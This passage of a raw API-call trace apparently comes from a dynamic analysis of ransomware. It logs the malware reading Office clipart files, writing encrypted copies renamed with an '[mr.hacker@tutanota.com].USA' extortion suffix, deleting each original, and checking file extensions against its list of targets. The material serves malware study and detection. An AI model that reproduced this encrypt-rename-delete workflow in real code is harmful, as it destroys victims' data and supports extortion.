0xffffffff [0056.500] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd20013_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0056.500] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0056.500] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0056.500] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd20013_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0056.500] GetLastError () returned 0x0 [0056.500] ReadFile (in: hFile=0x210, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x2b32, lpOverlapped=0x0) returned 1 [0056.608] WriteFile (in: hFile=0x220, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x2b40, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x2b40, lpOverlapped=0x0) returned 1 [0056.609] ReadFile (in: hFile=0x210, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0056.613] WriteFile (in: hFile=0x220, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.613] SetEndOfFile (hFile=0x220) returned 1 [0057.166] CloseHandle (hObject=0x220) returned 1 [0057.166] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0057.166] SetEndOfFile (hFile=0x210) returned 1 [0057.167] CloseHandle (hObject=0x210) returned 1 [0057.167] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0057.168] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd20013_.wmf")) returned 1 [0057.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 63 [0057.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 63 [0057.676] lstrlenW (lpString=".doc") returned 4 [0057.676] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.682] lstrlenW (lpString=".docx") returned 5 [0057.687] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.687] lstrlenW (lpString=".pdf") returned 4 [0057.688] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.688] lstrlenW (lpString=".xls") returned 4 [0057.688] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.688] lstrlenW (lpString=".xlsx") returned 5 [0057.688] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.688] lstrlenW (lpString=".ppt") returned 4 [0057.688] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 63 [0057.688] lstrlenW (lpString=".zip") returned 4 [0057.688] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.688] lstrlenW (lpString=".rar") returned 4 [0057.688] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.688] lstrlenW (lpString=".bz2") returned 4 [0057.688] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.688] lstrlenW (lpString=".7z") returned 3 [0057.689] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 63 [0057.689] lstrlenW (lpString=".dbf") returned 4 [0057.689] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 63 [0057.689] lstrlenW (lpString=".1cd") returned 4 [0057.689] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 63 [0057.689] lstrlenW (lpString=".jpg") returned 4 [0057.689] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.689] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0057.689] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0057.689] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00194_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0057.690] GetLastError () returned 0x0 [0057.690] ReadFile (in: hFile=0x214, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0xf92, lpOverlapped=0x0) returned 1 [0057.691] WriteFile (in: hFile=0x178, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xfa0, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xfa0, lpOverlapped=0x0) returned 1 [0057.692] ReadFile (in: hFile=0x214, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0057.692] WriteFile (in: hFile=0x178, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.692] SetEndOfFile (hFile=0x178) returned 1 [0057.692] CloseHandle (hObject=0x178) returned 1 [0057.692] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0057.692] SetEndOfFile (hFile=0x214) returned 1 [0057.693] CloseHandle (hObject=0x214) returned 1 [0057.693] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0057.693] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00194_.wmf")) returned 1 [0057.693] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 63 [0057.693] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 63 [0057.693] lstrlenW (lpString=".doc") returned 4 [0057.694] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.694] lstrlenW (lpString=".docx") returned 5 [0057.694] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.694] lstrlenW (lpString=".pdf") returned 4 [0057.694] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.694] lstrlenW (lpString=".xls") returned 4 [0057.694] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.694] lstrlenW (lpString=".xlsx") returned 5 [0057.694] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.694] lstrlenW (lpString=".ppt") returned 4 [0057.694] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.694] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 63 [0057.694] lstrlenW (lpString=".zip") returned 4 [0057.694] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.694] lstrlenW (lpString=".rar") returned 4 [0057.694] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.694] lstrlenW (lpString=".bz2") returned 4 [0057.694] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.694] lstrlenW (lpString=".7z") returned 3 [0057.694] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.694] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 63 [0057.694] lstrlenW (lpString=".dbf") returned 4 [0057.694] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.694] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 63 [0057.694] lstrlenW (lpString=".1cd") returned 4 [0057.694] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.694] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 63 [0057.694] lstrlenW (lpString=".jpg") returned 4 [0057.694] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.695] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=8070) returned 1 [0057.695] CloseHandle (hObject=0x214) returned 1 [0057.695] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00195_.wmf")) returned 0x20 [0057.695] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00195_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0057.695] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00195_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0057.696] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0057.696] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0057.696] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00195_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0057.696] GetLastError () returned 0x0 [0057.696] ReadFile (in: hFile=0x214, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x1f86, lpOverlapped=0x0) returned 1 [0057.697] WriteFile (in: hFile=0x178, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x1f90, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x1f90, lpOverlapped=0x0) returned 1 [0057.698] ReadFile (in: hFile=0x214, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0057.698] WriteFile (in: hFile=0x178, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.699] SetEndOfFile (hFile=0x178) returned 1 [0057.699] CloseHandle (hObject=0x178) returned 1 [0057.699] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0057.699] SetEndOfFile (hFile=0x214) returned 1 [0057.699] CloseHandle (hObject=0x214) returned 1 [0057.700] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0057.700] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00195_.wmf")) returned 1 [0057.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 63 [0057.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 63 [0057.700] lstrlenW (lpString=".doc") returned 4 [0057.700] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.700] lstrlenW (lpString=".docx") returned 5 [0057.700] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.700] lstrlenW (lpString=".pdf") returned 4 [0057.700] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.700] lstrlenW (lpString=".xls") returned 4 [0057.700] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.700] lstrlenW (lpString=".xlsx") returned 5 [0057.700] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.700] lstrlenW (lpString=".ppt") returned 4 [0057.700] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 63 [0057.700] lstrlenW (lpString=".zip") returned 4 [0057.700] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.700] lstrlenW (lpString=".rar") returned 4 [0057.700] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.700] lstrlenW (lpString=".bz2") returned 4 [0057.700] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.700] lstrlenW (lpString=".7z") returned 3 [0057.701] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.701] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 63 [0057.701] lstrlenW (lpString=".dbf") returned 4 [0057.701] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.701] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 63 [0057.701] lstrlenW (lpString=".1cd") returned 4 [0057.701] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.701] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 63 [0057.701] lstrlenW (lpString=".jpg") returned 4 [0057.701] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.701] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=9304) returned 1 [0057.701] CloseHandle (hObject=0x214) returned 1 [0057.701] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00234_.wmf")) returned 0x20 [0057.701] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00234_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0057.701] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00234_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0057.701] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0057.701] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0057.702] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00234_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0057.702] GetLastError () returned 0x0 [0057.702] ReadFile (in: hFile=0x214, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x2458, lpOverlapped=0x0) returned 1 [0057.703] WriteFile (in: hFile=0x178, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x2460, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x2460, lpOverlapped=0x0) returned 1 [0057.705] ReadFile (in: hFile=0x214, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0057.705] WriteFile (in: hFile=0x178, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.705] SetEndOfFile (hFile=0x178) returned 1 [0057.705] CloseHandle (hObject=0x178) returned 1 [0057.705] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0057.705] SetEndOfFile (hFile=0x214) returned 1 [0057.706] CloseHandle (hObject=0x214) returned 1 [0057.706] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0057.706] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00234_.wmf")) returned 1 [0057.706] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 63 [0057.706] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 63 [0057.706] lstrlenW (lpString=".doc") returned 4 [0057.706] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.706] lstrlenW (lpString=".docx") returned 5 [0057.706] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.706] lstrlenW (lpString=".pdf") returned 4 [0057.706] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.706] lstrlenW (lpString=".xls") returned 4 [0057.706] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.706] lstrlenW (lpString=".xlsx") returned 5 [0057.706] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.706] lstrlenW (lpString=".ppt") returned 4 [0057.706] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.707] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 63 [0057.707] lstrlenW (lpString=".zip") returned 4 [0057.707] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.707] lstrlenW (lpString=".rar") returned 4 [0057.707] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.707] lstrlenW (lpString=".bz2") returned 4 [0057.707] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.707] lstrlenW (lpString=".7z") returned 3 [0057.707] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.707] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 63 [0057.707] lstrlenW (lpString=".dbf") returned 4 [0057.707] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.707] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 63 [0057.707] lstrlenW (lpString=".1cd") returned 4 [0057.707] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.707] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 63 [0057.707] lstrlenW (lpString=".jpg") returned 4 [0057.707] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.707] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=4024) returned 1 [0057.707] CloseHandle (hObject=0x214) returned 1 [0057.707] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00242_.wmf")) returned 0x20 [0057.707] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00242_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0057.708] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00242_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0057.708] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0057.708] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0057.708] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00242_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0057.708] GetLastError () returned 0x0 [0057.708] ReadFile (in: hFile=0x214, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0xfb8, lpOverlapped=0x0) returned 1 [0057.709] WriteFile (in: hFile=0x178, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xfc0, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xfc0, lpOverlapped=0x0) returned 1 [0057.710] ReadFile (in: hFile=0x214, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0057.710] WriteFile (in: hFile=0x178, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.711] SetEndOfFile (hFile=0x178) returned 1 [0057.711] CloseHandle (hObject=0x178) returned 1 [0057.711] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0057.711] SetEndOfFile (hFile=0x214) returned 1 [0057.711] CloseHandle (hObject=0x214) returned 1 [0057.712] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0057.712] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00242_.wmf")) returned 1 [0057.712] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 63 [0057.712] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 63 [0057.712] lstrlenW (lpString=".doc") returned 4 [0057.712] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.712] lstrlenW (lpString=".docx") returned 5 [0057.712] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.712] lstrlenW (lpString=".pdf") returned 4 [0057.712] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.712] lstrlenW (lpString=".xls") returned 4 [0057.712] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.712] lstrlenW (lpString=".xlsx") returned 5 [0057.712] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.712] lstrlenW (lpString=".ppt") returned 4 [0057.712] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.712] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 63 [0057.712] lstrlenW (lpString=".zip") returned 4 [0057.712] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.712] lstrlenW 